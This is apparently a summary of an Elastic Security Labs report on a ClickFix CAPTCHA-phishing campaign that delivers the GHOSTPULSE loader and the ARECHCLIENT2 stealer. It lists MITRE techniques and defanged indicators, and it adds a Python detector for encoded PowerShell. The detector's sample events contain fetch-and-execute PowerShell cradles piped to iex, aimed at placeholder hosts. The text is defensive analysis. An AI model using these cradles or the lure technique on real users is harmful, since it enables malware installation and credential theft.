A Wretch Client: From ClickFix Deception to Information Stealer Deployment – Elastic Security Labs

The ClickFix social engineering technique is increasingly used as an initial access vector in multi-stage malware campaigns, delivering loaders like GHOSTPULSE and infostealers such as ARECHCLIENT2. This campaign targets users through deceptive CAPTCHA-like phishing pages, enabling malware execution and extensive credential theft. #ClickFix #GHOSTPULSE #ARECHCLIENT2

Key points

  • ClickFix is a prevalent social engineering method tricking users into executing malicious PowerShell commands by mimicking CAPTCHA or system prompts.
  • GHOSTPULSE loader is used as a multi-stage payload loader, delivering encrypted payloads and utilizing DLL sideloading techniques.
  • The campaign deploys ARECHCLIENT2 (SectopRAT), a .NET remote access trojan and infostealer targeting cryptocurrency wallets, passwords, and system data.
  • The initial infection often originates from compromised domains clients.dealeronlinemarketing[.]com and clients.contology[.]com hosted on IP 50.57.243[.]90.
  • ARECHCLIENT2 communicates with hardcoded command and control servers including 144.172.97[.]2 and 143.110.230[.]167 with a complex infrastructure of proxy servers.
  • GHOSTPULSE employs encrypted configuration files and process detection to evade analysis and delay execution in monitored environments.
  • The campaign has been closely monitored by Elastic Security Labs with increasing activity observed throughout 2024 and into 2025.

MITRE Techniques

  • [T1204.002] User Execution: Malicious Link – ClickFix tricks users into copying and pasting malicious PowerShell commands disguised as CAPTCHA verification prompts (‘…users instructed to copy a seemingly harmless “fix”… which is a malicious PowerShell command…’).
  • [T1047] Windows Management Instrumentation – Use of PowerShell commands fetched from remote URLs to download and execute malware components (‘…Invoke-webrequest content | iex…’).
  • [T1129] Shared Modules – GHOSTPULSE loader injects decrypted stage 2 payload into a loaded DLL (vssapi.dll) (‘…injects it into a loaded library using the LibraryLoadA function…’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Execution of encoded PowerShell commands copied by ClickFix technique (‘…copies a base64-encoded PowerShell command to the clipboard…’).
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – Using a legitimate executable to load a malicious DLL for stealthy execution (‘…Crysta_X64.exe loads the malicious DLL DllXDownloadManager.dll…’).
  • [T1083] File and Directory Discovery – ARECHCLIENT2 collects file and system information for reconnaissance (‘…gathers extensive system details, including OS, hardware, IP, machine name, geolocation…’).
  • [T1055.001] Process Injection: Dynamic-Link Library Injection – GHOSTPULSE performs payload injection into memory to evade detection (‘…injects decrypted code into a loaded library…’).
  • [T1140] Deobfuscate/Decode Files or Information – ARECHCLIENT2 decrypts payload sections from memory using a TLS section XOR key (‘…decrypts ARECHCLIENT2 sample using the .tls section…’).
  • [T1027] Obfuscated Files or Information – ARECHCLIENT2 uses heavy obfuscation and encrypted strings to evade detection (‘…heavily obfuscated .NET remote access tool…’).
  • [T1566] Phishing – The campaign uses phishing pages mimicking Cloudflare anti-DDoS CAPTCHA verifications to lure victims (‘…a phishing page that imitates a Cloudflare anti-DDoS Captcha verification…’).
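Detection logic for the ClickFix execution chain described above (a clipboard-pasted, base64-encoded PowerShell command that fetches remote content and pipes it to iex), written as an added example that is not part of the Elastic report: it decodes -EncodedCommand payloads and scores process-creation events. The sample events, URLs and scoring threshold are constructed assumptions.

```python
import base64
import re

# Constructed sample process-creation events (parent image, child image, command line).
# Event 0 mimics a ClickFix paste: explorer.exe spawning hidden, encoded PowerShell
# whose decoded body is a download cradle ("Invoke-WebRequest ... | iex").
_CRADLE = "Invoke-WebRequest -Uri http://example.invalid/fix | iex"
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell.exe -w hidden -ep bypass -enc "
     + base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -NoP -Command \"iex (iwr 'http://example.invalid/c').Content\""),
    ("cmd.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\notes.txt"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
FETCH = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient", re.I)
EXEC = re.compile(r"invoke-expression|\biex\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def clickfix_indicators(parent, child, cmdline):
    """Return the list of ClickFix-style indicators matched by one event."""
    if child.lower() != "powershell.exe":
        return []
    hits = []
    decoded = decode_encoded_command(cmdline)
    effective = cmdline if decoded is None else cmdline + " " + decoded
    if decoded is not None:
        hits.append("encoded_command")
    if parent.lower() == "explorer.exe":
        hits.append("interactive_parent")  # typed/pasted by the user, not a script host
    if HIDDEN.search(cmdline):
        hits.append("hidden_window")
    if FETCH.search(effective) and EXEC.search(effective):
        hits.append("download_cradle")  # fetch-and-execute in one command line
    return hits


def find_clickfix_alerts(events, threshold=2):
    """Return (event index, indicators) for events meeting the threshold (an assumed value)."""
    scored = [(i, clickfix_indicators(*e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in scored if len(hits) >= threshold]
```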

Indicators of Compromise

  • [Domain] Phishing infrastructure – clients.dealeronlinemarketing[.]com, clients.contology[.]com (used to host captcha phishing pages)
  • [IPv4 Address] Malware hosting and C2 servers – 50.57.243[.]90 (phishing page and initial payload), 144.172.97[.]2 and 143.110.230[.]167 (ARECHCLIENT2 command and control servers)
  • [File Hash] GHOSTPULSE components – 2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a (DivXDownloadManager.dll), a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 (Heeschamjiet.rc PNG)
  • [File Hash] Loader and final payload – f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 (DOTNET loader), 4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 (ARECHCLIENT2)
  • [URI] Pastebin URL hosting C2 IP list – https://pastebin[.]com/raw/Wg8DHh2x (used by ARECHCLIENT2 for secondary C2 retrieval)


Read more: https://www.elastic.co/security-labs/a-wretch-client